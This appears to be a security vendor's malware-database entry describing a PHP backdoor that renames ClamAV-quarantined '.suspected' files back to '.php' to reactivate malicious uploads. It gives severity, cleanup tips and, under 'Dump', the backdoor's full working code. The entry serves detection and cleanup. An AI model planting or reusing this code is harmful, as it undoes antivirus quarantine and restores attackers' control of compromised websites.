PRICING SUPPORT LOGIN

A backdoor that renames quarantined files by ClamAV with extension .suspected back to .php in order to re-enable the previous maliciously uploaded files, or if any left by previous attack. It's used by the attacker to try to gain control back to an infected website where he has uploaded malicious files before.

Severity

MEDIUM

Affecting

This malicious code affects any vulnerable or compromised website that is configured to interpret the script language.

Cleanup

Inspect your site's files, specially theme related, to find for code you don't recognize. Look for any encoded or obfuscated PHP code.
Also, you can sign up with us and let our team remove the malware for you.

Dump

set_time_limit(0);
ignore_user_abort();

$dir = scandir("..");


foreach ($dir as $dirr)
{
if (strpos($dirr, ".suspected"))
{
$newdirr = str_replace(".suspected", "", $dirr);
rename("../".$dirr, "../".$newdirr);
}
}